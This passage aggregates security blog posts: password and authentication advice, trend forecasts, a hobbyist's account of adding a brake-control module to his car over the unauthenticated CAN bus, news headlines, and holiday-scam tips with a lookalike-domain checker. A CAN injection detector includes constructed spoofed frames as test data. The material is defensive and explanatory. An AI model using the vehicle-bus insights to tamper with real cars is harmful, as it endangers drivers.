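The scoring is what defeats the usual tricks: "C0ntos0Blank12" normalizes to "contosoblank12", loses "contoso" and "blank" to the banned list, and is left with "12", four points in total and rejected even though it satisfies every classic complexity rule. Pass the user's name in personal_terms and "Alice1!" falls the same way.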

Better yet, move away from passwords entirely. One of the reasons passwords are frequently stolen is that they work from anywhere. Windows Hello allows users to set up device authentication using either a PIN or biometrics, such as a fingerprint scanner or face recognition. This form of authentication is easier for users because they don't have to remember complex passwords, but it is also safer because the credential is bound to the device: a hacker would need physical possession of the device plus the biometrics or PIN to use it.

Enable productivity with self-service

The Azure self-service portal allows you to turn over common tasks to your users, saving your help desk time without increasing your risks. Azure AD self-service password reset (SSPR) offers a simple means for users to reset their passwords or unlock accounts without administrator intervention. You can also give users the ability to manage groups using Azure AD security groups and Office 365 groups. Known as self-service group management, this feature allows group owners who are not assigned an administrative role to create and manage groups without relying on administrators to handle their requests. Letting users reset their own passwords and manage groups gets them back to productive work quickly while reducing your tech support costs.

You can use the SSPR deployment plan as a step-by-step guide to walk you through the implementation process.

In future blog posts, we will provide additional Azure AD configuration recommendations to help secure your identities. We will then touch on the recommended security best practices to protect your apps, devices, and infrastructure.

Learn more

Check back in a few weeks for our next blog post: Step 3. Protect your identities. In this post, well dive into additional protections you can apply to your identities to ensure that only authorized people access the appropriate data and apps.

Get deployment help now

FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.

Resources

The post Step 2. Manage authentication and safeguard access: top 10 actions to secure your environment appeared first on Microsoft Secure.

The Year Ahead: Cybersecurity Trends To Look Out for In 2019

A Proven Record Tracking Cybersecurity Trends

This time of the year is always exciting for us, as we get to take a step back, analyze how we did throughout the year, and look ahead at what the coming year will bring. Taking full advantage of our team’s expertise in data and application security, and mining insights from our global customer base, we’ve decided to take a different approach this time around and focus on three key, and overriding trends we see taking center stage in 2019.

2018 brought with it the proliferation of both data and application security events and, as we predicted, data breaches grew in size and frequency and cloud security took center stage globally. With that in mind, let’s take a look at what next year holds.

Data breaches aren’t going away anytime soon, which will bolster regulation and subsequent compliance initiatives

Look, there’ll be breaches, and the result of that is going to be more regulation, and therefore more compliance; this is a given. In fact, the average cost of a data breach in the US in 2018 exceeded $7 million.

Whether it’s GDPR, Australia’s privacy law, Thailand’s new privacy laws or Turkey’s KVKK, it doesn’t matter where you are: regulation is becoming the standard, whether at a regional, group or individual-country level.

Traditionally when we looked at data breaches, the United States lit up the map, but as regulatory frameworks and subsequent compliance measures expand globally, we’re going to see a change.

The annual number of data breaches and exposed records in the United States from 2005 to 2018 (in millions) [Statista]

What you’ll see in 2019, and certainly as we move forward, is a red rosy glow covering the entire globe. In 2019 you’ll hear more of “It’s not just the United States. This happens everywhere.”

Let’s unpack this for a second. If you were going to steal private data or credit card details, why would you do it in an environment that has world-class, or even mediocre, cybersecurity measures in place? If everyone else is even slightly less protected, that’s where you’re going to find people targeting data; we simply hear more about it in regions where regulation and compliance are a major focus.

To that end, we don’t necessarily see 2019 as the year where regulators start hitting companies with massive fines for non-compliance. Maybe by the end of the year, or in cases of outright egregious negligence. But you’ll find that companies have put in the legwork when it comes to compliance.

Having your head in the cloud(s) when it comes to managing risk… not a bad idea

McKinsey reports that, by 2020, organizations will be spending more than six times as much on cloud-specific products as on general IT services; and according to a survey by LogicMonitor, up to 83% of all enterprise workloads will be in the cloud around that same time.

LogicMonitor’s Future of the Cloud Study [Forbes]

Organizations continue to capitalize on the business benefits of the digital economy and, as such, end up pushing more and more data into the cloud. Now, we’re not saying that this is being done without some forethought, but are they classifying data as they go, while increasingly opening their businesses up to the cloud?

Teams need to recognize that, as they transition their data to the cloud, they must also transition their awareness of what’s in the cloud: who is using it, when they’re using it, and why they’re using it. 2019 isn’t going to be the year that businesses figure out they need to do that. What we will see, however, is increasingly cloud-friendly solutions hitting the market to solve these challenges.

Social Engineering and the rise of AI and machine learning in meeting staffing issues

One of 2019’s most critical developments will be how the cybersecurity industry steps up to meet the increasing pressure on security teams to perform. According to the Global Information Security Workforce Study, the shortage of cybersecurity professionals will hit 1.8 million by 2022, but at the same time, a report by ESG shows just nine percent of millennials are interested in a career in cybersecurity.

What we’re going to see is how AI and machine learning in cybersecurity technology will close the gaps in both numbers and diversity of skills.

Organizations today have to solve the problem of cybersecurity by hiring for a host of specialized competencies: network security, application security, data security, email security and now, cloud security. Whatever the prefix, those security skills are crucial to any organization’s security posture.

Here’s the thing: there aren’t a lot of people who can credibly claim to know cloud security, database security, application security, data security, or file security. There just aren’t. We know that, and we know businesses are trying to solve that problem, often by doing the same old things they’ve always done, which is the most common solution. Do more antimalware, do more antivirus, do more things that don’t work. In some cases, however, they’re doing things around AI and trying to solve the problem by leveraging technology. The latter will lead to a shift where organizations dive into subscription services.

There are two facets driving this behavior. The first is the fact that, yes, organizations realize that they are not the experts, but that there are experts out there. Unfortunately, those experts just don’t work for them; they work for the companies that are offering this as a service.

Secondly, companies are recognizing that there’s an advantage in going to the cloud because, and this is a major determining factor, it’s OpEx, not CapEx. The same is true of subscription services, whether in the cloud or on-prem; it doesn’t matter. Driven by skills shortages and cost, 2019 will see an upswing in subscription services, where a provider is actually solving cybersecurity problems for you.

We should add here, however, that as more organizations turn to AI and machine learning-based decision making for their security controls, attackers will probe those same models, looking for inputs the classifier misjudges so they can slip past the defenses built on it.

Special mention: The ‘trickledown effect’ of Cyberwarfare

The fact is, cyber attacks between nations do happen, and it’s a give-and-take situation. This is the world we live in: right now these are, quite frankly, tolerated types of behavior that won’t necessarily lead to war. But someone still stands to gain.

Specifically, they’re attacking third-party businesses, contractors and financial institutions. That’s why cybersecurity is so important: there needs to be an awareness that somebody might be stealing your data for monetary gain. It might be somebody stealing your data for political gain too, and protecting that data is just as critical, regardless of who’s taking it.

Now, while state-hacking isn’t necessarily an outright declaration of war these days, it doesn’t end there. The trickledown effect of nation-state hacking is particularly concerning, as sophisticated methods used by various governments eventually find their way into the hands of resourceful cybercriminals, typically interested in attacking businesses and individuals.

Repeat offenders

No cybersecurity hit list would be complete without the things that go bump in the night and, while all of them might not necessarily be ballooning, they’ll always be a thorn in security teams’ sides.

  • Following the 2017 Equifax breach, API security made it onto the OWASP Top 10 list and remains there for good reason. With the expanding use of APIs and the difficulty of detecting attacks against them, we’ll see attackers continuing to take aim at APIs as a target for a host of different threats, including brute-force attacks, app impersonation, phishing and code injection.
  • Bad actors already understand that crypto mining is the shortest path to making a profit, and continue to hone their techniques to compromise machines in the hope of mining crypto-coins or machines that can access and control crypto-wallets.
  • Low effort, easy money, full anonymity and potentially huge damage to the victim… what’s not to like when it comes to ransomware? It’s unlikely that we’ll see these types of attacks go away anytime soon.

If there’s one overriding theme we’d like to carry with us into 2019 it’s the concept of general threat intelligence, the idea that it’s better to have some understanding of the dangers out there and to do something, rather than nothing at all.

We often talk about the difference between risk and acceptable risk or reasonable risk, and a lot of companies make the mistake of trying to boil the ocean… trying to solve every single problem they can, ultimately leaving teams feeling overwhelmed and short on budget.

Acceptable risk isn’t, “I lost the data because I wasn’t blocking it. I get it. And it wasn’t a huge amount of data because at least I have some controls in place to prevent somebody from taking a million records, because nobody needs to read a million records. Nobody’s going to read a million records. So, why did I let it happen in the first place?”

Acceptable risk is “I know it happened, I accept that it happened, but it’s a reasonable number of events, it’s a reasonable number of records, because the controls I have in place aren’t so specific, aren’t so granular that they solve the whole problem of risk, but they take me to a world of acceptable risk.”

It’s better to begin today, and begin at the size and relevance that you can, even if that only takes you from high to medium risk, or reasonable to acceptable risk.

The post The Year Ahead: Cybersecurity Trends To Look Out for In 2019 appeared first on Blog.

How I Hacked My Connected Vehicle, and Other Thoughts on Vehicle Cybersecurity

In the near future, self-driving vehicles will likely be the norm. Cars today are essentially just computers with wheels, and they’re becoming increasingly interconnected. This, of course, provides opportunities to make our lives easier, but it also increases the digital attack surface and potential risks if manufacturers leave proper vehicle cybersecurity measures unaddressed or incomplete.

Whether or not you’re into car hacks, I invite you to continue reading. I’ll share some insights into what we can expect for the future of connected vehicles and the security challenges this represents to customers and manufacturers — and also explain how I was able to hack my Mitsubishi.

Car Electronics 101

First, if you’re new to car electronics, it’s important to understand a few basic concepts. A few years back, before I started getting into car hacks, I remember friends saying their car computers had an issue and needed to be replaced. I used to imagine there was only one computer in a car that controlled all electronics, but I couldn’t have been more wrong.

Modern vehicles have several computers, each designed for very specific tasks, and they’re interconnected by an internal network. Modern vehicles also have sensors that measure everything from temperature to oil pressure, wheel speed, tire inflation, and more, all of which are read and acted on by specific modules that are, in essence, very specialized computers.

Below is a list of the most commonly found car electronics. Note that this isn’t an exhaustive list, and different car manufacturers may name these systems differently:

  1. Engine control module (ECM)
  2. Transmission control unit (TCU)
  3. Body control module (BCM)
  4. Electronic brake control module (EBCM)
  5. Climate control unit
  6. Supplemental restraint system (SRS) control module

Vehicles today commonly implement what’s known as a Controller Area Network (CAN bus) so the different modules/computers inside a vehicle can share information. For example, the ECM may need to inform you about a problem with the engine by sending an error code to be displayed on the dashboard, or the EBCM may need to send a signal to the ECM to reduce engine torque if the current driving terrain is too slippery.

In fact, the internal vehicle network is constantly carrying hundreds of messages a minute from the different sensors and computers. Just like the early days of the internet, when every computer on the network was assumed to be “good,” the computers inside your car will receive and act on any instruction they are sent: a CAN frame carries an arbitration ID and a payload but no sender identity or signature, so everything on the bus is treated as coming from a trusted source.
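An added example, not the author’s tooling, to make that trust problem concrete in Python. A CAN frame is just an arbitration ID and up to eight data bytes, so nothing in the frame lets a module tell a genuine sender from an injector; but most IDs are broadcast on a fixed period, and an injected frame disturbs that cadence. The block parses candump-style lines (“(timestamp) iface ID#HEXDATA”), learns each ID’s period from a clean capture, and flags frames in a second capture that arrive too early. The IDs, payloads and timings are constructed for the example and mean nothing on a real vehicle:

```python
"""CAN frame parser plus a timing-based injection check.

Added example for this post, not the author's tooling.  The IDs, payloads
and timestamps are constructed and carry no manufacturer meaning.
"""
import re
from collections import defaultdict
from statistics import median

FRAME_RE = re.compile(
    r"^\((?P<ts>\d+\.\d+)\)\s+(?P<iface>\S+)\s+"
    r"(?P<id>[0-9A-Fa-f]{3,8})#(?P<data>[0-9A-Fa-f]*)$"
)


def parse_frame(line):
    """Parse one candump-style line into a dict; rejects payloads over 8 bytes."""
    m = FRAME_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a CAN frame: {line!r}")
    data = bytes.fromhex(m["data"])
    if len(data) > 8:
        raise ValueError("classic CAN payload is at most 8 bytes")
    return {"ts": float(m["ts"]), "iface": m["iface"], "id": int(m["id"], 16), "data": data}


def learn_periods(frames, min_samples=3):
    """Median inter-arrival time per arbitration ID, learned from a clean capture."""
    last, gaps = {}, defaultdict(list)
    for f in sorted(frames, key=lambda f: f["ts"]):
        if f["id"] in last:
            gaps[f["id"]].append(f["ts"] - last[f["id"]])
        last[f["id"]] = f["ts"]
    return {cid: median(g) for cid, g in gaps.items() if len(g) >= min_samples}


def find_injected(frames, periods, tolerance=0.5):
    """Return frames that follow the previous frame with the same ID sooner than
    tolerance * learned period.  IDs with no learned period are not judged."""
    last, suspicious = {}, []
    for f in sorted(frames, key=lambda f: f["ts"]):
        cid = f["id"]
        if cid in periods and cid in last and f["ts"] - last[cid] < tolerance * periods[cid]:
            suspicious.append(f)
        last[cid] = f["ts"]
    return suspicious


def _periodic(cid, period, count, data):
    """Build constructed candump lines for one ID sent every `period` seconds."""
    return [f"({i * period:.6f}) can0 {cid:03X}#{data}" for i in range(count)]


# Constructed clean capture: two IDs on 100 ms and 50 ms cycles.
BASELINE_LOG = _periodic(0x1A3, 0.100, 10, "0F00A1") + _periodic(0x2B0, 0.050, 10, "00")
# Constructed attack capture: the same traffic plus two spoofed 0x1A3 frames
# slipped in between the genuine ones, carrying a different first byte.
ATTACK_LOG = BASELINE_LOG + ["(0.530000) can0 1A3#FF00A1", "(0.630000) can0 1A3#FF00A1"]


def detect(baseline_lines=BASELINE_LOG, attack_lines=ATTACK_LOG):
    """Learn cadence from the clean capture, then return (ts, hex payload) of early frames."""
    periods = learn_periods(parse_frame(l) for l in baseline_lines)
    hits = find_injected([parse_frame(l) for l in attack_lines], periods)
    return [(round(f["ts"], 3), f["data"].hex()) for f in hits]


if __name__ == "__main__":
    for ts, data in detect():
        print(f"suspicious frame at {ts:.3f}s: {data}")
```

Timing alone is a weak signal: an injector that fires just before a genuine frame gets the genuine one flagged instead, and an attacker who can also suppress the real sender (or replace the module, as the post goes on to do) keeps the cadence intact. It is cheap to run on a bus that has no authentication at all, which is the point.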

Listen to the podcast: Connected Cars, Smart Homes and IoT Security

Emerging Challenges Related to Connected Vehicles

Technologies like vehicle-to-vehicle (V2V) and vehicle-to-infrastructure (V2I) communications are on the rise, and I’m sure they’ll provide many benefits to consumers, manufacturers and even public infrastructure management. In the future, it will likely be very common for vehicles to receive updates over the air (OTA) just like your smartphone does today. This may help improve existing features and performance or even add new features to your vehicle.

However, it is of the utmost importance that proper security controls are taken into consideration from the very early stages, given that every new technology represents a potential new attack vector. For example, attacks that involve cloning or relaying your wireless key fob are becoming more common, and until car manufacturers address these security weaknesses, you may want to store your wireless key fob in a Faraday bag.

Additionally, every car manufacturer uses different codes or messages on their CAN bus. For example, a message taken from the CAN bus that contains “665 F0 16 00 00” may instruct the car to turn on the headlights for one manufacturer, but it may turn up the radio volume for another, or simply do nothing. This represents another challenge for security researchers, as these messages are often not publicly available and must be reverse-engineered. This adds a level of difficulty for someone who may want to hack your car by adding, for example, a module to control it remotely over a cellular network, but it certainly doesn’t make the task impossible.

How I Was Able to Hack My Vehicle

To demonstrate that it is possible to add new modules/computers that a vehicle will simply trust without performing any checks, I’ll share with you the details of how I was able to add a set of new features to my own vehicle. Although the module I added is from the same manufacturer, someone with enough knowledge and time can create their own module and add it to a car.

The feature I wanted to add to my Mitsubishi car is called Active Stability and Traction Control (ASTC), which combines traction control and stability control and can also be useful for specific off-road situations. I set out to get a copy of the workshop manual for the car, which contains detailed wiring diagrams of all components. While reading through it, it became evident that the ASTC feature was controlled by the EBCM, so I knew I had two options: try to modify the firmware of my unit or get a different model of EBCM. Reverse engineering a firmware from scratch takes a lot of work and skills, so at that point, the most reasonable option was to get a different model of EBCM that already had the ASTC feature.

After reviewing the workshop manual, I found the wiring diagram, and it showed that this new EBCM also needed a steering angle sensor (SAS), an ASTC off button, a new relay called a stop lamp relay and some changes in the brakes wiring. For reference, below are the two wiring diagrams from the workshop manual that helped me understand how my car is wired (the question marks represent the wires that were missing on my car).

Diagram 1

Diagram 2

Before purchasing the required components, I wanted to make sure this would work. So, I started to review the wires directly from my car, and to my surprise, the harness for the SAS and the ASTC off button were already there. It seemed that the required components for the ASTC feature should interact with each other, so there was only one missing piece of the puzzle: Will the new components integrate with all the other control modules?

I performed some additional research and came across something car manufacturers call variant coding, which is a code that tells all control modules which features they have enabled and which are disabled. For Mitsubishi vehicles, this code is set on the BCM — they call it ETACS — so without the ability to modify the variant code, the new EBCM wouldn’t work. Fortunately, there’s a tool called ETACS decoder developed by Earl Vadim that allows you to do exactly that.

So, I purchased all the required parts, plugged them in and rewired everything according to the specifications in the workshop manual. Pictured below is the EBCM main plug on which I had to perform some rewiring.

Plug image 1

After turning the car on, as expected, a bunch of diagnostic trouble codes (DTCs) popped up since the new EBCM was expecting a variant coding with the ASTC feature enabled.

Errors image 1

What followed were several hours of trial and error, disconnecting the car battery and reconnecting it after each change on the variant coding. Finally, I found the right variant code for this specific car make, model and set of features, shown below.

Coding image 1

Most of the DTCs were gone at this point, and all that was left to do was calibrate the SAS and change a setting on the ECM to tell it that the ASTC module was available (this was done with the same ETACS decoder software).

Finally, I went out for a test drive and the ASTC feature seemed to work as expected. However, there was one missing piece: There was supposed to be a light on the dashboard that would tell me each time ASTC was engaged, but I did not see that light popping up during the test drive. The next step was to disassemble the dashboard and check what was going on. After opening it, it became evident that the LED for ASTC, as well as some resistors and transistors, were missing. Fortunately, the circuit board had the space to solder in all those components.

The Future of Vehicle Cybersecurity

The same methods I used to perform these modifications could allow a malicious hacker to embed a custom piece of hardware and control almost any feature on a vehicle, ranging from brakes and acceleration to windshield wipers and the microphone. This can be as simple as putting together a Raspberry Pi, a CAN bus interface and wireless access, then plugging it into the CAN bus of a vehicle. Doing this would require physical access to the vehicle, but remember that connected vehicles, with their own wireless paths onto the bus, are becoming more and more common these days.

To wrap up, here are some key takeaways from this project:

  1. Variant code tells the control modules of a car which features are active or inactive.
  2. There are several computers in modern vehicles, each managing very specific tasks, that are interconnected through a local network within the car.
  3. Components from different models made by a manufacturer may work if they are properly configured and wired.
  4. Car control modules trust whatever information is sent on the local network and don’t seem to perform any kind of validation of the packets or the authenticity of other control modules or devices connected to the CAN bus.
  5. Most importantly, anyone with enough knowledge and time can create modules to control your car remotely.

And remember: Any device that can wirelessly provide access to the internal CAN bus of a vehicle is a potential new attack vector, making it critical to implement proper vehicle cybersecurity measures.

Listen to the podcast: Connected Cars, Smart Homes and IoT Security

The post How I Hacked My Connected Vehicle, and Other Thoughts on Vehicle Cybersecurity appeared first on Security Intelligence.

The year ahead: More breaches, bolstered regulation and the rise of AI

This time of the year is always exciting for us, as we get to take a step back, analyze how we did throughout the year, and look ahead at what the coming year will bring. Taking full advantage of our team’s expertise in data and application security, and mining insights from our global customer base, we’ve decided to take a different approach this time around and focus on three key, and overriding trends we see … More

The post The year ahead: More breaches, bolstered regulation and the rise of AI appeared first on Help Net Security.

Digital skills are critical for tackling the rising tide of cybercrime

The rising tide of cybercrime shows no sign of slowing. Whether it’s hacking, identity fraud or malware attacks, online criminals have proven themselves to be both relentless and ruthless. Targets have included public sector institutions, charities, even the UK’s National Health Service (NHS) was not spared. In this challenging climate, it is unsurprising that police forces are facing extreme pressure to protect victims and take meaningful action against the perpetrators, who are hard to track … More

The post Digital skills are critical for tackling the rising tide of cybercrime appeared first on Help Net Security.

Equifax: A study in accountability but not authority responsibility

Like most of the security community, I have spent hours digesting the recently released U.S. House of Representatives Committee on Oversight and Government Reform report on the Equifax breach. I read the report with a mix of heartfelt empathy and fear-inducing understanding of some of the findings. I feel empathy because my role has offered me a unique view on the size and scope of the threats facing many organizations; fear because some of the … More

The post Equifax: A study in accountability but not authority responsibility appeared first on Help Net Security.

Security Affairs newsletter Round 192 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

STOLEN PENCIL campaign, hackers target academic institutions.
WordPress botnet composed of +20k installs targets other sites
A new Mac malware combines a backdoor and a crypto-miner
Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS
Expert devised a new WiFi hack that works on WPA/WPA2
Hackers defaced Linux.org with DNS hijack
Google will shut down consumer version of Google+ earlier due to a bug
Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries
Seedworm APT Group targeted more than 130 victims in 30 organizations since Sept
A new variant of Shamoon was uploaded to Virus Total while Saipem was under attack
Cyber attack hit the Italian oil and gas services company Saipem
New threat actor SandCat exploited recently patched CVE-2018-8611 0day
Novidade, a new Exploit Kit is targeting SOHO Routers
French foreign ministry announced its Travel Alert Registry Hack
ID Numbers for 120 Million Brazilians taxpayers exposed online
Operation Sharpshooter targets critical infrastructure and global defense
A bug in Facebook Photo API exposed photos of 6.8 Million users
New Sofacy campaign aims at Government agencies across the world
WordPress version 5.0.1 addressed several vulnerabilities
Magellan RCE flaw in SQLite potentially affects billions of apps
Which are the worst passwords for 2018?

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 192 – News of the week appeared first on Security Affairs.


Security Breach of Over 120 million Taxpayers in Brazil

Recently, the Tax ID, better known as Cadastro de Pessoas Fisicas (CPF ID) consisting of over 120 million taxpayers in

Security Breach of Over 120 million Taxpayers in Brazil on Latest Hacking News.

McAfee Blogs: Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online

It was the last item on my list and Christmas was less than a week away. I was on the hunt for a white Northface winter coat for my teenage daughter that she had duly ranked as the most-important-die-if-I-don’t-get-it item on her wishlist that year.

After fighting the crowds and scouring the stores to no avail, I went online, stressed and exhausted with my credit card in hand looking for a deal and a Christmas delivery guarantee.

Mistake #1: I was under pressure and cutting it way too close to Christmas.
Mistake #2: I was stressed and exhausted.
Mistake #3: I was adamant about getting the best deal.

Gimme a deal!

It turns out these mistakes created the perfect storm for a scam. I found a site with several name-brand coats available at lower prices. I was thrilled to find the exact white coat and guaranteed delivery by Christmas. The cyber elves were working on my behalf for sure!

Only the coat never came and I was out $150.

In my haste and exhaustion, I overlooked a few key things about this “amazing” site that played into the scam. (I won’t harp on the part about me calling customer service a dozen times, writing as many emails, and feeling incredible stupidity over my careless clicking!)

Stress = Digital Risk

I’m not alone in my holiday behaviors it seems. A recent McAfee survey, Stressed Holiday Online Shopping, reveals, unfortunately, that when it comes to online shopping, consumers are often more concerned about finding a deal online than they are with protecting their cybersecurity in the process. 

Here are the kinds of risks stressed consumers are willing to take to get a holiday deal online:

  • 53% think the financial stress of the holidays can lead to careless shopping online.
  • 56% said that they would use a website they were unfamiliar with if it meant they would save money.
  • 51% said they would purchase an item from an untrusted online retailer to get a good deal.
  • 31% would click on a link in an email to get a bargain, regardless of whether they were familiar with the sender.
  • When it comes to sharing personal information to get a good deal: 39% said they would risk sharing their email address, 25% would wager their phone number, and 16% would provide their home address.

3 Tips to Safer Online Shopping:

  • Connect with caution. Using public Wi-Fi might seem like a good idea at the moment, but you could be exposing your personal information or credit card details to cybercriminals eavesdropping on the unsecured network. If public Wi-Fi must be used to conduct transactions, use a virtual private network (VPN) to help ensure a secure connection.
  • Slow down and think before you click. Don’t be like me, exhausted and desperate while shopping online: think before you click! Cybercriminals love to target victims with phishing emails disguised as holiday savings or shipping notifications, to lure consumers into clicking links that could lead to malware or a phony website designed to steal personal information. Check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use comprehensive security protection that can help protect devices against malware, phishing attacks, and other threats. Protect your personal information by using a home solution that keeps your identity and financial information secure.
  • Take a nap, stay aware. This may not seem like an important cybersecurity move, but during the holiday rush, stress and exhaustion can wear you down and contribute to poor decision-making online. Outsmarting the cybercrooks means awareness and staying ahead of the threats.

I learned the hard way that holiday stress and shopping do not mix and can easily compromise my online security. I lost $150 that day and I put my credit card information (promptly changed) firmly into a crook’s hands. I hope by reading this, I can help you save far more than that.

Here’s wishing you and your family the Happiest of Holidays! May all your online shopping be merry, bright, and secure from all those pesky digital Grinches!

The post Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online appeared first on McAfee Blogs.




Tips for avoiding Christmas scams

Christmas is supposed to be a time for joy, peace and goodwill to everyone – but criminals aren’t getting the message. In fact, one US cybersecurity firm estimates that online crime will increase by nearly 60% over the festive period.

These figures shouldn’t be a surprise. The amount of shopping we do online increases exponentially during December, particularly around Black Friday, Cyber Monday and the period between Boxing Day and New Year.

So how can you better protect yourself in the face of concerted efforts to steal your money and personal information?

Fake websites

Probably the easiest scam to spot – and avoid – is the fake website. Scammers will often set up online shops that look “real”, copying a well-known brand’s website. But if you try and buy something, you will not receive your goods, and the scammer may steal your credit card details too.

There are two quick and effective ways to identify a fake website. First, the actual address will not be quite right. Instead of amazon.com, the site address may be amazon-us.com – close, but wrong.

Second, the prices advertised are much, much lower than you can find anywhere else. Retailers can reduce prices a little, but they tend to be very similar across the market. If an offer is too good to be true, it probably is.

You can protect yourself against fake websites by checking whether they fail either of the tests above. You should also install an Internet safety toolkit like Panda Dome which includes a safe browsing feature, designed to stop you being tricked into visiting fake websites.

Phishing emails

Another form of fakery, phishing emails generally pretend to come from a well-known retailer. Some will try and convince you to click through to a standard fake website, others will trick your computer into downloading malware.

Malware presents the biggest threat to your personal security online. Hackers can use these tiny applications to scan your computer for valuable – or embarrassing – data to steal. They can monitor exactly what you type on your keyboard – including passwords and credit card numbers – over the course of days, weeks or months. Or your computer could be joined to a bot network, ready to participate in a larger fraud at some point in the future.

Because the run up to Christmas is so busy, it is easy to let your guard down. Time is short and your inbox is full, so you may not conduct the quick checks that protect you. But it is absolutely vital that you check each message for the following:

  • Sender address – any sales email coming from a “free” service like Gmail or Yahoo is likely to be fake.
  • Message attachments – legitimate sales emails never contain attachments, but fakes do.
  • Spelling and grammar – poorly worded emails are often a sign that the message may be fake, written by a foreign hacking gang.

Any message that fails these tests should be scanned using an anti-malware tool like Panda Dome – or deleted immediately.
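The two fake-website tests (address not quite right, prices too good) and the three e-mail checks above are easy to state and easy to forget under holiday pressure, so here is the part of them that a mail filter or browser helper can automate. This is an added example written for this page, not code from Panda Security or the Panda Dome product: `check_site` flags a URL whose registrable domain is not on an allowlist but still contains a brand name (`amazon-us.com`, `amaz0n.com`, `amazon.com.deals-now.net`), and `screen_email` applies the sender-domain and attachment rules and runs every link in the body through `check_site`. The allowlist, brand list, freemail list and the tiny stand-in for the Public Suffix List are all constructed; the "too good to be true" price test and the spelling test remain human judgment.

```python
import re
from urllib.parse import urlsplit

# Constructed allowlist: the shops the reader actually buys from.
TRUSTED_DOMAINS = {"amazon.com", "amazon.co.uk"}
# Brand words whose appearance in any other domain is a lookalike signal.
BRAND_WORDS = {"amazon"}
# Constructed stand-in for the Public Suffix List (two-label suffixes only).
MULTI_PART_SUFFIXES = {"co.uk", "com.au", "co.jp"}
# Sales mail from a free webmail provider is the post's first red flag.
FREEMAIL_DOMAINS = {"gmail.com", "yahoo.com", "outlook.com", "hotmail.com"}
# Digit-for-letter substitutions commonly seen in lookalike names.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "$": "s"})
URL_RE = re.compile(r"https?://[^\s<>\"']+")


def registrable_domain(host: str) -> str:
    """'www.amazon.co.uk' -> 'amazon.co.uk'; 'amazon-us.com' -> 'amazon-us.com'."""
    labels = host.lower().strip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_PART_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def check_site(url: str) -> str:
    """Classify a shop URL as 'trusted', 'lookalike' or 'unknown'."""
    host = urlsplit(url).hostname
    if not host:
        return "unknown"
    if registrable_domain(host) in TRUSTED_DOMAINS:
        return "trusted"
    # Fold digits to letters and drop hyphens so 'amaz0n' and 'amazon-us'
    # compare like the brand name; a brand in a subdomain counts too.
    folded = host.lower().translate(HOMOGLYPHS).replace("-", "")
    if any(brand in folded for brand in BRAND_WORDS):
        return "lookalike"
    return "unknown"


def screen_email(sender: str, attachments: list, body: str) -> list:
    """Return the reasons a sales e-mail looks fake (empty list = passes)."""
    reasons = []
    domain = sender.rsplit("@", 1)[-1].lower()
    if domain in FREEMAIL_DOMAINS:
        reasons.append("sender uses a free webmail address")
    if attachments:
        reasons.append("sales message carries attachments: " + ", ".join(attachments))
    for url in URL_RE.findall(body):
        if check_site(url) == "lookalike":
            reasons.append("links to a lookalike shop: " + url)
    return reasons


if __name__ == "__main__":
    # Constructed sample message in the style the post warns about.
    print(screen_email("deals@gmail.com", ["invoice.zip"],
                       "White coats 70% off at https://amazon-us.com/offer"))
```

The registrable-domain step matters: `amazon.com.deals-now.net` passes a naive "starts with amazon.com" check, and hyphenated or digit-swapped names pass an exact-match check. Unicode homograph domains (IDN) need the real Public Suffix List plus a confusables table and are deliberately out of scope here.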

Protect yourself now

According to the study mentioned at the start of this article, cyberattacks peak just after Christmas – so it’s not too late to protect yourself. Download a free trial of Panda Dome today and help to keep your computer safe from Christmas killjoys.

Download Free Antivirus

The post Tips for avoiding Christmas scams appeared first on Panda Security Mediacenter.

Most concerning security controls for cyberattackers? Deception and IDS

Attivo Networks surveyed more than 450 cybersecurity professionals and executives globally to gain insights into detection trends, top threat concerns, attack surface concerns, and what’s on their 2019 security wish list. Overall, the survey highlighted that the battle to keep cyber attackers from successfully compromising networks is not working. Over 50% of respondents reported that 100 days of dwell time or more was representative of their organization, while nearly half of respondents indicated that their … More

The post Most concerning security controls for cyberattackers? Deception and IDS appeared first on Help Net Security.

Most organizations suffered a business-disrupting cyber event

A study conducted by Ponemon Institute found that 60 percent of organizations globally had suffered two or more business-disrupting cyber events — defined as cyber attacks causing data breaches or significant disruption and downtime to business operations, plant and operational equipment — in the last 24 months. Further, 91 percent of respondents had suffered at least one such cyber event in the same time period. Despite this documented history of damaging attacks, the study found … More

The post Most organizations suffered a business-disrupting cyber event appeared first on Help Net Security.

Microsoft AI competition explores the next evolution of predictive technologies in security

Predictive technologies are already effective at detecting and blocking malware at first sight. A new malware prediction competition on Kaggle will challenge the data science community to push these technologies even further: to stop malware before it is even seen.

The Microsoft-sponsored competition calls for participants to predict if a device is likely to encounter malware given the current machine state. Participants will build models using 9.4GB of anonymized data from 16.8M devices, and the resulting models will be scored by their ability to make correct predictions. Winning teams get $25,000 in total prizes.

The competition provides academics and researchers with varied backgrounds a fresh opportunity to work on a real-world problem using a fresh set of data from Microsoft. Results from the contest will help us identify opportunities to further improve Microsoft’s layered defenses, focusing on preventative protection. Not all machines are equally likely to get malware; competitors will help build models for identifying devices that have a higher risk of getting malware so that preemptive action can be taken.

Cybersecurity is the central challenge of our digital age. Today, Windows Defender Advanced Threat Protection (Windows Defender ATP) uses intelligent systems to protect millions of devices against cyberattacks every day. Machine learning and artificial intelligence drive cloud-delivered protections that catch and predict new and emerging threats.

